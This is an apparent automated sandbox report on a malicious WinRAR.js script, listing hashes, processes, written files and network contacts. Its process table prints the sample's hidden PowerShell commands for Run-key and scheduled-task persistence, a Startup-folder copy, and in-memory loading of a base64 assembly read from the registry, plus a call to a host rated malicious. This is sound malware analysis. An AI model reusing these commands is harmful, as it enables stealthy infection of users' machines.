File name: | WinRAR.js |
Full analysis: | https://app.any.run/tasks/62efad4f-2732-4a94-bd86-5ab9897b0bd6 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 11:05:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | 1A443C2FEE7C2032549BDEFC98F0E9E0 |
SHA1: | 17805B746673B6DBF8AD71F4DD2EA220A598C486 |
SHA256: | 6BBC1C68A93077B02A6FD2AA8244429449D4E577C2FADDEBA1E4DD7E234EEEB1 |
SSDEEP: | 768:kzivJcDFoQ0SbzPrZdmuAgme0wfjLp0LGo9/FT7cH4VZsmU/EkVz7TMpSjVFGvqn:kzifQ0ynZdqvOfjIj9/j/sXr7hjVAvZ0 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
688 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\WinRAR.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3288 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value 'C:\Users\admin\AppData\Local\Temp\WinRAR.js' -PropertyType String -Force;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3596 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "schtasks /create /sc minute /mo 45 /tn start /tr 'C:\Users\admin\AppData\Local\Temp\WinRAR.js'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1788 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\WinRAR.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\WinRAR.js'))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2032 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'start').start;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4044 | "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 45 /tn start /tr C:\Users\admin\AppData\Local\Temp\WinRAR.js | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MWAK91PDW31308ICV10H.temp | — | |
MD5:— | SHA256:— | |||
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6GB03FVLR7612KR42GYN.temp | — | |
MD5:— | SHA256:— | |||
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKWI0IRF42WCPMMIQGFY.temp | — | |
MD5:— | SHA256:— | |||
2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQ0ZSVQPHNHNRS4G58D1.temp | — | |
MD5:— | SHA256:— | |||
3288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8b5e.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8bcc.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.js | text | |
MD5:1A443C2FEE7C2032549BDEFC98F0E9E0 | SHA256:6BBC1C68A93077B02A6FD2AA8244429449D4E577C2FADDEBA1E4DD7E234EEEB1 | |||
2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8bdb.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2032 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2032 | powershell.exe | 194.5.97.145:21000 | holydns.warzonedns.com | — | FR | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
holydns.warzonedns.com |
| malicious |